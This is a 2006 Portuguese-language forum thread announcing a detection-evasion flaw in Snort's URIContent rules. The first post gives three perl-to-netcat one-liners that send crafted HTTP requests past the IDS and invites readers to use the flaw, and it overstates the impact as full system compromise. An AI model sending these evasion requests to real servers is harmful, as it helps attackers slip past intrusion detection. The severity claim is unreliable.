Falha no Snort

Started by HadeS, 04 de June , 2006, 12:21:38 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

HadeS

04 de June , 2006, 12:21:38 PM
Uma falha novinha do Snort (Sistema de IDS mais famoso do mundo Unix), pode comprometer um sistema totalmente.

A falha está, basicamente, nas regras do Snort, detecção de evasão.

O atacante pode enviar pacotes maliciosos, que passaram sem problemas pelo IDS, e assim podendo comprometer totalmente o sistema. Um ataque bem sucedido pode dar acesso total ao atacante.

Algumas informações técnicas sobre a falha:

Nome: Snort URIContent Rules Detection Evasion Vulnerability
Tipo: Remota
Versões vulneráveis: Snort Project Snort 2.4.4 (A mais recente :P)
Snort Project Snort 2.4.3
Snort Project Snort 2.4.2
Snort Project Snort 2.4.1
Snort Project Snort 2.4.0

Três exeplos simples de exploração:

perl -e'print "GET /www.SEU_SITE.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc SERVIDOR.VULNERAVEL 80

perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc IP.DO.CARA.AQUI 80

perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc IP.DO.CARA.AQUI 80

Acho que deu pra entender, e ter uma noção da falha né? É crítica, todas as versões estão vulneráveis, ainda disconheço algum patch, e a maioria dos servidores Unix usam Snort. Façam bom proveito da falha, e de modo consiente.

HadeS

_Dr4k0_

#1
04 de June , 2006, 12:35:31 PM
interessante isso..
galera usa snort..

eu gosto muito dele apesar de não usar linux..
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

Anonymous

#2
06 de June , 2006, 02:03:11 PM
Tá aí mais uma prova que nada é seguro. Nem mesmo um sistema do mundo Unix.
Print
Go Up Pages1
User actions